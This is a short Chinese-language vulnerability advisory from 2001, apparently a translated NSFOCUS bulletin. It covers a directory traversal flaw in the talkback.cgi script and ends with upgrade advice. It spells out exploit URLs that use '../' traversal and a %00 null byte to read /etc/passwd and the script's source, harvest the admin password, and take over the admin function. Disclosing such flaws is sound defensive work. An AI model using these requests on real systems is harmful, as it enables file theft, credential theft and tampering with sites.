安全研究
安全漏洞
talkback.cgi 遍历目录漏洞
发布日期:2001-04-11
更新日期:2001-04-11
受影响系统:
talkback.cgi
描述:
Talkback.cgi 允许远程用户(WEB页面访问者)以WEB服务器所拥有的权限访问WEB服务
器上任意文件。远程用户提交如下URL:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
.../../../../../../../../etc/passwd%00&action=view&matchview=1
将显示出/etc/passwd文件内容。
如果提交这样一个URL:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
.../cgi-bin/talkback.cgi%00&action=view&matchview=1
将显示talkback.cgi自身的原代码,其中包含管理口令$admin_password。上面假设
talkback.cgi位于cgi-bin下,实际测试的时候可能需要修改。当你获取了管理口令
之后,提交如下URL:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
就可以贴文章、删文章了。
参看
http://www.waytotheweb.com
<* 来源:Stan a.k.a. ThePike (
stan@whizkunde.org) *>
建议:
访问如下链接获取talkback.cgi升级版本
http://www.waytotheweb.com/webscripts/talkback.htm
浏览次数:3743
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |